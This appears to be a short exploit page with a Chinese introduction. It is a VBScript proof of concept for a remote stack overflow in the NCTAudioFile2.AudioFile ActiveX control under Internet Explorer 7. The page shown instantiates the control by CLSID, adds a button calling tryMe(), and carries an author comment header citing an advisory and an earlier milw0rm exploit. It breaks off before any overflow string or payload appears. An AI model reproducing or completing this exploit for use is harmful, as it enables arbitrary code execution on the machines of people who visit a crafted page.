本文展示了一个针对 Internet Explorer 7 的 AudioFile ActiveX 控件远程堆栈溢出漏洞的演示代码。该漏洞允许攻击者通过特制网页执行任意代码。
<html> <object classid='clsid:77829F14-D911-40FF-A2F0-D11DB8D6D0BC' id='NCTAudioFile2'></object> <input language=VBScript onclick=tryMe() type=button value="Click here to start the test"> <script language = 'vbscript'> Sub tryMe
'------------------------------------------------------------------ '[PoC2] IE NCTAudioFile2.AudioFile ActiveX Remote Stack Overfl0w 'original advisory: http://secunia.com/advisories/23475/ 'author: shinnai 'mail: shinnai[at]autistici[dot]org 'site: http://shinnai.altervista.org 'based on: http://www.milw0rm.com/exploits/3728 '(see what InTeL said about Win XP Pro SP2 and IE7, enjoy brotha ;) 'modified for working on Win XP Pro SP2 with IE7 full patched '------------------------------------------------------------------